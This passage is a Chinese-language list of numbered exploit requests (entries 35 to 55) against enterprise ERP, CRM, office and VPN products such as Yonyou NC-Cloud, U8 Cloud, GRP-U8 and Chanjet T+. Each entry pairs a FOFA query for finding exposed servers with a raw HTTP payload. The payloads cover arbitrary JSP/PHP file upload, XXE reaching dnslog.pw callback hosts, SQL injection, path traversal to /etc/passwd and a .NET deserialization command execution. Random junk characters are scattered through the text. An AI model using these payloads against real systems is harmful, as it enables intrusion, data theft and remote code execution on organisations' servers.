5 o4 Z5 c* F! O. l9 _' g3 G! zContent-Type: application/x-www-form-urlencoded
; f* X( W) r/ M. LAccept-Encoding: gzip, deflate
. `- ?1 a  R1 u' U  r9 cAccept: */*4 K1 Q8 V  a9 B3 ?
Connection: keep-alive
" u$ m, d* m) z. L' b& A& a# ?3 ]8 u  Q0 c) o* E4 Q$ n2 X% Z

3 s5 Y, {" u  _3 k* d35. 用友NC-Cloud importhttpscer任意文件上传$ R" S# j+ d, B8 R" A  y% P6 b
FOFA:app="用友-NC-Cloud"8 t) n! a# ?/ Q+ s' a$ x
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1: J) Y2 {7 r: j7 n
Host: 203.25.218.166:8888! J- y" I7 p, G! L$ p* d$ V' v  H, g
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info7 K/ T, P* \5 j8 N4 J3 O
Accept-Encoding: gzip, deflate
0 b' U+ q5 y# `4 R" y6 s. R' ]Accept: */*
  w2 I+ ~1 p2 c; EConnection: close) O* e9 \7 a# V7 T' N
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
7 p; I: `6 ~" v5 a3 \: KContent-Length: 190- I, ?7 x1 ^4 b
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
2 _0 y  G& V  e* ~; V" L% i" I- ~- _# I- O6 R# Y. N* B
--fd28cb44e829ed1c197ec3bc71748df0
4 _4 r; K3 E: C2 dContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"! S/ [. S& }! W/ [

' l& a) }: ]8 }& T<%out.println(1111*1111);%>7 x1 R) |0 |6 D7 u4 q( X' W
--fd28cb44e829ed1c197ec3bc71748df0--
9 L! s4 e9 d/ v  M+ y9 G! G+ g& X0 T' Q3 \7 [
2 I/ G  [: j0 W  A' O2 J% ~
36. 用友NC-Cloud soapFormat XXE
; H% m; ~+ @  H/ E8 q" r8 B( WFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
6 A6 y7 }. i( l  E" {+ bPOST /uapws/soapFormat.ajax HTTP/1.1, X' i! Q1 V: s* Z
Host: 192.168.40.130:8989
2 Q$ ]3 i# M1 B' R9 I) QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0- M  L7 T  n0 d; a4 z* F
Content-Length: 263) `5 l, w$ }( I" o! n  O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* m6 m1 z2 R" J4 JAccept-Encoding: gzip, deflate/ ]5 _; l$ e0 L# t3 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ Z% E+ d4 _; j! H  Y9 b; P- P. H. \6 s
Connection: close2 o: D- _. M8 K+ d. ]
Content-Type: application/x-www-form-urlencoded# e; b6 o8 b- T
Upgrade-Insecure-Requests: 12 v$ U! E7 H8 C3 @! [; v* f
) U  V6 Y, l, R5 N
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
# o" @) M4 d* x$ r
  m: b% J) X" [9 q0 Z% Q  \9 v- }* @0 b; L( D8 V
37. 用友NC-Cloud IUpdateService XXE
/ P2 R% ^" x( a: y' jFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"3 T# n# H: M7 o1 h: f2 \% _# Q) H6 m! s
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
+ b" H& r! x% g& N$ |Host: 192.168.40.130:8989, Y6 o0 Q' ]6 u- f/ ?' T* g" T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36* Y( N4 M! K# m- ]3 X1 f; f
Content-Length: 421% f- b. P) ?% D0 R! V2 P8 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  `! O7 y$ K8 P' ]+ cAccept-Encoding: gzip, deflate
! h. \3 ^) Y% K% @Accept-Language: zh-CN,zh;q=0.9& q; K! O) i9 Q1 q' P  ^
Connection: close
  p6 C6 s6 }" w, m. `! NContent-Type: text/xml;charset=UTF-8. b4 W3 @5 R2 w! ^
SOAPAction: urn:getResult
- {6 a6 D8 G8 R, qUpgrade-Insecure-Requests: 1
" ~/ |3 W  h  T6 e* ?6 [- v4 D  d$ p
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
0 _- X0 T7 M5 j: \! }( H<soapenv:Header/>% `0 n+ G8 q3 R' A4 j
<soapenv:Body>
1 [* m) D; K% d* }: K<iup:getResult>3 Y1 S+ h0 u+ M% F
<!--type: string-->& {. ?8 o/ F, Y
<iup:string><![CDATA[
* F; D, x+ a* d<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
0 |$ U8 {* _/ M<xxx/>]]></iup:string>9 M7 i( s* {- N( C/ \
</iup:getResult>- r0 P: V; ~! X% y0 ~
</soapenv:Body>
. Q5 q$ S" g9 R) b</soapenv:Envelope>6 u1 Z0 ^) a- T

/ ?9 C" G' Y0 _
# Z2 e( W, ~: a7 R5 J4 {, h" z! \% w; s! o: a* J" x5 t+ c0 e
38. 用友U8 Cloud smartweb2.RPC.d XXE
0 P& L" ]0 M9 M6 R" W2 a. q; B4 `FOFA:app="用友-U8-Cloud"
9 a4 ~+ L+ a! q, BPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.18 H; Z5 G1 _: ^9 h/ L9 [% F  s$ k
Host: 192.168.40.131:8088* a- F. R. |0 B, L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25$ ~3 o9 R! L, {# ^% W3 [) d
Content-Length: 260( j2 C! T4 s( ?+ P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
9 Y, p' @/ G6 I1 c: e1 N$ E* jAccept-Encoding: gzip, deflate
; ~9 ~, r! S$ x) m" H/ dAccept-Language: zh-CN,zh;q=0.9
+ L2 ^8 b. g" zConnection: close
3 k8 t: \( K/ ~( V) {# V$ RContent-Type: application/x-www-form-urlencoded
9 n& Y# N3 ~$ b) D
7 y, F- F% X" t! }* P5 |__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>0 |5 C9 O' T, N! V6 O/ q

- f4 W. T7 h. D6 M( m, K$ Q6 {  v$ X# }) y. x0 C* S* I& N; W
39. 用友U8 Cloud RegisterServlet SQL注入; T7 Q4 B& G( f
FOFA:title="u8c"
# E( m. y8 S6 |POST /servlet/RegisterServlet HTTP/1.14 y7 u4 e" X6 J
Host: 192.168.86.128:8089: y, G2 q# b* E4 L* F9 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% P" j9 h6 h2 g5 `, v9 T
Connection: close
' J# g8 V2 c1 |4 F; o/ g7 ^, z8 \3 NContent-Length: 85
1 ~+ b% q! d& q+ n! BAccept: */*) c# K5 \! P( p5 ^
Accept-Language: en$ b8 O$ o- X; A* _1 Q1 J) a
Content-Type: application/x-www-form-urlencoded- O! G* g& ~3 g/ P* D; I
X-Forwarded-For: 127.0.0.1
- a) f+ G) y' [6 _2 r1 HAccept-Encoding: gzip& c. M3 T8 b, Q6 U' E

+ \( ~& ~$ n( S0 @7 gusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
3 ?' n1 w3 U$ d" o/ h
1 o# [. |# k9 k. T: [" c/ `6 v
$ r+ ]/ u/ y1 ?40. 用友U8-Cloud XChangeServlet XXE
8 O8 i4 U' j; y; {FOFA:app="用友-U8-Cloud"
! B: e, P: F$ t& C2 }0 Y5 ~- V8 f+ \. gPOST /service/XChangeServlet HTTP/1.1! J( Q4 V# G2 h5 _4 M, R3 J
Host: x.x.x.x
7 s* K9 b3 \( X2 X/ a1 zUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 ~. w3 T+ G5 D  M% H& }9 {Content-Type: text/xml
: \! w- {7 S0 g2 q. QConnection: close4 l; n) G7 B/ {: \/ c
1 I, R" R9 h" Q
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>. e' J% ?1 \+ u! r& b+ ?/ q
3 H$ ?! c! b! M, S, n

6 U3 f5 M$ H% Y7 m5 s41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
9 P2 a5 y  D; |4 JFOFA:app="用友-U8-Cloud"
3 D! ]) U( t8 |) g) {+ W! {$ s& wGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
6 p. y$ M  l" d+ `8 \. J. xHost:
" i$ R* V8 g6 O( y: cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- q+ z3 _: ~7 d+ m2 G! g# x0 F( EContent-Type: application/json
- X# e1 P  B- cAccept-Encoding: gzip
" E! w% q( m/ k, o7 XConnection: close
  Y/ f& T3 n6 Z+ w5 }& t$ p: Q  z7 F8 V

5 @. y. J  b/ a& s3 k42. 用友GRP-U8 SmartUpload01 文件上传: r6 {  _; K5 E3 ]* I# C6 f( f" ]
FOFA:app="用友-GRP-U8"3 }2 Q2 `% N6 O8 \3 p7 m" G
POST /u8qx/SmartUpload01.jsp HTTP/1.14 }7 K$ E4 l* B6 |9 K
Host: x.x.x.x
+ Y4 k  b8 _- QContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
/ n  F, D# s7 p& r- xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
* ^! N. M' s6 P6 _& a% `' M, Z1 L/ D
PAYLOAD
6 ~  ]$ `! w  {1 M$ G4 K$ m$ v6 Y+ T( Y

% f8 s+ X  W4 ?* w  S! K8 Khttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml/ o0 F/ P0 w: f9 H8 }! N$ u

  z( d* n$ N: o- Z) y% l43. 用友GRP-U8 userInfoWeb SQL注入致RCE) o. n4 F- {( Z0 N2 ]
FOFA:app="用友-GRP-U8". o! u; h3 g1 h8 x7 F
POST /services/userInfoWeb HTTP/1.1' [( t! U7 N2 E/ J( H0 a+ o
Host: your-ip" a2 a5 U, [, j7 ^( o8 p" \+ G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36  K+ Z  [8 q1 ^6 c: S5 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  a' E& Q+ L3 g. q) @5 e
Accept-Encoding: gzip, deflate  C/ a% \; x5 t& }" f6 j
Accept-Language: zh-CN,zh;q=0.97 O4 Q4 ~7 c+ x  O
Connection: close
. Z1 A1 G/ j) t4 cSOAPAction:
1 _1 J$ U( |" j# @4 VContent-Type: text/xml;charset=UTF-8' B  j3 H! z3 L, Q- U# |
: n% `8 ?% ^/ `6 _7 N
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
& I6 T- O7 e5 `+ L1 I2 C' U# B   <soapenv:Header/>
7 ?, J# R& E8 P% k   <soapenv:Body>
4 [% Y2 \) `- q/ L/ _. v, p  I      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">* o5 u) e) n/ O" `9 c2 \7 k
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>2 [2 q3 m& r" d% _" C7 j
      </ser:getUserNameById>  j0 d) C) h8 d) [+ ], g
   </soapenv:Body>
7 H; V- }# \- L& _/ o</soapenv:Envelope>
# r& z7 J1 _+ ?  G
. B; K4 I# A5 i& \1 A1 A: F
, [0 k8 T( v9 A9 z2 z8 e& o1 Y3 B44. 用友GRP-U8 bx_dj_check.jsp SQL注入- Y" z) g& U3 p3 K( {" G1 Y/ Z: t5 e& q
FOFA:app="用友-GRP-U8"
4 \! S  x( ]3 B& R6 K) ^: VGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.19 v6 T2 }2 i5 B4 S& E( I
Host: your-ip
. Z' |  n# K( i; d0 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36  }: k$ P& b; v2 ^3 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! y7 t/ F) k5 |* J* D. N( d% bAccept-Encoding: gzip, deflate
! q* o1 }% I, }( T' M2 `Accept-Language: zh-CN,zh;q=0.9
2 q( X5 t6 X" V2 w( @- D: N& ~& UConnection: close8 [, V) `0 R8 S8 e3 U9 @  Q
* b- q2 }& l( g; U2 S8 P
3 {  m5 X8 z$ {: M" B% Q
45. 用友GRP-U8 ufgovbank XXE
) Z4 E9 @% A" Z) n. CFOFA:app="用友-GRP-U8"
' K! [/ r: f1 S+ r0 qPOST /ufgovbank HTTP/1.1
4 S9 i  {+ n3 p' i' T( s: yHost: 192.168.40.130:222
; T+ w# D/ d" \# JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
" [4 c0 s8 e& GConnection: close
/ A& w/ l, w/ O4 Z1 v$ L$ F$ [+ ^5 AContent-Length: 161
9 ~5 I& f# A8 o& v6 S( O8 @" f; NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. J1 S9 A& S, C$ HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 R% y" k& q- D4 XContent-Type: application/x-www-form-urlencoded1 Q0 Y/ J! ]) Y( @$ C9 R; r
Accept-Encoding: gzip# L% t  G  |4 h  [( \3 E
; s# q' F$ g" I  }% n
reqData=<?xml version="1.0"?>
; b5 C* U- u8 S<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest% O% G; p# A- S: B& t! e
5 ?* e" h8 d" ~! K7 \

9 c. s+ S8 `; W$ z; n6 l46. 用友GRP-U8 sqcxIndex.jsp SQL注入0 Y0 Z' `4 M- ]+ x! A. f* D
FOFA:app="用友-GRP-U8"8 b7 ~* Y" G8 l0 P/ Y  Y0 n
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.19 S$ S  s/ J$ k5 A8 H
Host: your-ip* D. n5 \0 L9 Z+ f7 L2 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
% j8 g/ W- K+ o  W! ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# k- p, A- @6 ~8 a8 y* y8 b' c+ k
Accept-Encoding: gzip, deflate5 m5 z* z' P$ V8 @: j5 {  t9 {
Accept-Language: zh-CN,zh;q=0.9# t6 `# U: l# Y7 m5 d
Connection: close' M( ~+ K2 Y6 G3 Z" [) }
$ j0 k9 ~# V4 ]& R. G2 F

4 v5 j/ o- @: J, G6 `$ ?" e47. 用友GRP A++Cloud 政府财务云 任意文件读取8 L' ~* j, E, i
FOFA:body="/pf/portal/login/css/fonts/style.css"
5 y! I# o6 j. Z) d" ]GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
! E6 i3 m9 c/ s$ {" ^Host: x.x.x.x
! J) p' w1 p7 i. u2 q, w$ @Cache-Control: max-age=0
9 ~* h) s8 T+ t! S6 o+ {Upgrade-Insecure-Requests: 17 u4 K! w  F# L- ~) ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 L" f6 M  G7 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) x# N+ x5 h4 c4 g: j* t
Accept-Encoding: gzip, deflate, br: t! d5 r3 w, ]
Accept-Language: zh-CN,zh;q=0.99 `- v8 i" W! U6 o' B( R/ {
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT, j* I7 y& _( c0 E& d4 E: Y6 O
Connection: close" J( f4 }4 O+ D

8 ]  _% l& [- T4 @2 r& K4 J. ^3 I" L

+ C$ S7 A% v7 Q; Z* t: ]8 N48. 用友U8 CRM swfupload 任意文件上传! ^3 y0 Y, M" z: m4 z" c1 q
FOFA:title="用友U8CRM"
. v$ i9 i2 t' ePOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.17 \' n, n6 q4 w' o0 m5 B4 i
Host: your-ip& a- C! k# }% G' n# ]8 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' L# J0 K- _  t, h0 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- W2 s5 H( y" m2 u5 d. U# rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ ^2 e* {) i% Y2 M  Q3 ^8 @, NAccept-Encoding: gzip, deflate8 I8 t: M+ J& r, m8 j0 ?: R
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
' Y/ \0 p$ m: U  }7 C------269520967239406871642430066855. @8 a$ B3 Q. r- f" j$ O
Content-Disposition: form-data; name="file"; filename="s.php"8 C: `: _3 t6 o$ ?7 W$ A' S
1231
( |- e- Z' I: O. v, SContent-Type: application/octet-stream4 w2 c3 @0 d2 r/ F+ T5 r: s
------269520967239406871642430066855
, p. ]7 C6 W$ ]' _Content-Disposition: form-data; name="upload": k% o+ F% B7 s0 ~+ Z9 a
upload- ~5 V2 X2 w7 n& }4 c+ J/ b
------269520967239406871642430066855--
* C1 j3 ?2 V* r  Q3 e/ t. s! J+ e  V( ^/ g$ b' S+ m
( u; X8 S6 B0 Z
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
1 z' x, @+ S1 H+ d( l& R0 O+ H4 n9 n" Y8 IFOFA:body="用友U8CRM"
) @& W) @$ ^, r
# s1 R6 V: o; V# zPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1) ^. V6 D0 m& K5 e: E+ C
Host: x.x.x.x
+ i. l$ l+ Z) y  w! ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 n5 G4 S) [# |$ tContent-Length: 329
) [& Z; I6 c+ z. ]3 ~5 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, a; O4 m" b7 h+ N4 ^Accept-Encoding: gzip, deflate+ i! @* J, A; Z: v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& m' }; F+ q. }6 [
Connection: close  D+ `9 x8 v5 j4 ~0 a4 J2 Z
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
7 r; H3 x/ V0 q' b1 f3 c
/ Y/ @, T3 U& L) ]; X+ s-----------------------------vvv3wdayqv3yppdxvn3w
* x) _' V9 A/ H  c4 ?  }6 |Content-Disposition: form-data; name="file"; filename="%s.php "5 M- V5 v# U* w+ H: H8 ~# k- L2 I2 b
Content-Type: application/octet-stream# }) ]2 @4 o2 U, H/ x
  w6 l9 T: o9 M7 T3 X+ m3 e
wersqqmlumloqa
' Q  q" E% `  Y% W+ v/ X! O-----------------------------vvv3wdayqv3yppdxvn3w6 {, r8 z0 s) d7 Y* i
Content-Disposition: form-data; name="upload"
: I, T( r4 v0 j
. v' ~& M6 E2 r* _2 M# Mupload/ c- c+ ?8 H( n; b: C
-----------------------------vvv3wdayqv3yppdxvn3w--
$ L* C  T% M4 N' h' n5 O+ z* h
: A, U0 f7 F8 d  j5 Y. C9 R2 W: t$ Q- G
http://x.x.x.x/tmpfile/updB3CB.tmp.php( [" k( L6 _$ q* c3 z% \: K. P" W1 A

, D. h" ?# E! z8 s# d50. QDocs Smart School 6.4.1 filterRecords SQL注入
" ?* }; e5 \1 V. l& CFOFA:body="close closebtnmodal"
* E- l( H. G# f- _, Y; uPOST /course/filterRecords/ HTTP/1.1
' K7 q: H& k" I9 vHost: x.x.x.x5 R, ^# F& Z- s6 h1 J# ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# c3 S9 e' `% h4 R2 `
Connection: close% X! |- H; e0 a& o
Content-Length: 224
7 z2 `, q$ p1 w8 O' _Accept: */*
' U3 m) t. r) V  f# O6 t6 zAccept-Language: en
! N* J& {: m4 ]; HContent-Type: application/x-www-form-urlencoded
# o2 \/ f, @( n; g0 G7 z  MAccept-Encoding: gzip2 }( g( v, T- N1 o& A5 S/ E( g! B$ z

& p1 [$ T0 |$ f2 W* usearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
3 ^; t4 s# F" z* M* H% V( V  t7 h9 J; p' D

$ {4 @9 K! f" g" h( C6 `8 O51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入( i! r% m1 U7 f0 N! a$ P+ x
FOFA:app="云时空社会化商业ERP系统"$ y4 U% c4 U- ~' ~% X& F7 W
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
5 _* ~& z) P' g( cHost: your-ip
: J1 }& H8 F) uUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
! g1 g* R5 A' ^- y6 Q$ aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
" v9 P, Q& e8 q: k+ m" {2 OAccept-Encoding: gzip, deflate
% y/ ]3 S2 T- W( p$ t- |5 h' a6 t4 S2 CAccept-Language: zh-CN,zh;q=0.9; G8 C4 g1 a3 d
Connection: close* b, b7 d" ]$ V- n6 U2 W! ]
' i. w% S) `$ |& s) `7 ^
' @; k8 r/ v: h# {/ ?! c9 p
52. 泛微E-Office json_common.php sql注入
  u4 `4 k- D7 m- {6 P5 v& D" AFOFA:app="泛微-EOffice"
# R; n% v6 _" m0 qPOST /building/json_common.php HTTP/1.1
- O# ?4 l* D9 U* }& iHost: 192.168.86.128:8097
4 N$ }  }$ M$ ?: [! {2 j  X3 YUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' _4 ^* c- e* \' K7 s& ]3 S* uConnection: close4 I, H6 Z& s& R! a
Content-Length: 873 ^* R" A' W2 U9 Z
Accept: */*
. m9 V3 r2 e. K$ w& RAccept-Language: en
7 Z; _2 D/ D$ k' f3 f) _! b7 OContent-Type: application/x-www-form-urlencoded
* h4 R+ W0 p" r9 T4 A) i5 g$ BAccept-Encoding: gzip8 W6 `5 S; y: I- y2 s* }$ K* }* ]

0 x5 o4 K) S' X. Mtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
$ N/ N; @8 R9 ^1 \7 M( o# ^! t; S, Y5 F: Z! p$ m

: b( W, P2 Q5 c  u53. 迪普 DPTech VPN Service 任意文件上传
& g/ `2 z* S4 FFOFA:app="DPtech-SSLVPN"5 b- o% e- Y9 ~
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd8 V% [# P3 D( A! K# d; J
$ ~9 E2 `& I+ g7 ^
! P( w9 n/ \) ~7 i  Y  m
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
" R- H, J& q/ w$ y% Y2 n3 _FOFA:app="畅捷通-TPlus"4 q0 s: c, h1 Z  U! b
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件, W9 N2 |! e% z- M( ~0 d
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"4 B; K1 m+ j  t% I9 }2 W4 {( y  Q
/ J9 W: u# |# y

8 Y% P/ |1 b5 Q+ g, y5 \完整数据包
7 g( a( T0 Y5 b! q5 Y% UPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
: V8 x+ V. i6 V) R$ e$ zHost: x.x.x.x
' |, I+ I) K, [/ Z2 S. sUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
7 K% R; [  a) n) @4 z/ _Content-Length: 5930 n  S# X" j7 O. S

/ {$ G8 @  V- {" t7 S* D. [  n{+ S! Y5 m# m, \+ t1 ~" i2 j- a- q
"storeID":{/ D. F' W( y. W% @  t# t# h
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
5 I3 x8 u; m: Z0 B$ i "MethodName":"Start",
0 K# P$ V6 g3 G5 A8 R5 |# V/ R) h: k/ C  "ObjectInstance":{
+ }% t7 n2 Q" d" M8 K   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) T$ C# D6 `, U; `  F& W; U
    "StartInfo":{
$ j7 t$ P9 p3 D4 Q" E3 n. `   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",1 r* o: X! q+ ^% a
    "FileName":"cmd",! n" K2 V) e1 a8 O$ M" S  Z, a  n8 @
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"0 M2 e, Z. N$ V
    }0 p! l( C2 C  @0 o9 e7 _
  }
: p- Z7 a+ n' j- M- C8 i/ I, K" y  }1 V/ v- S7 Q4 N' D: k
}
! A2 i* b! A- b& k+ [! m- [- T2 p
2 I$ A2 q! _% O
第二步,访问如下url
+ W* `! G. [2 i/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt& u( M/ w$ I0 K. X

& x0 k% C! Q" F& D# ?( d/ Y; w
- M+ H* x, m6 A- Y7 @55. 畅捷通T+ getdecallusers信息泄露
" c% N' N! r" o7 @/ ^7 F9 EFOFA:app="畅捷通-TPlus"
7 g* T  j* U4 T1 k/ c第一步,通过
) g9 X+ _0 }. u' e/ E( q' {+ D& h/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
, b1 e2 R% e; l' V, H第二步,利用获取到的Cookie请求
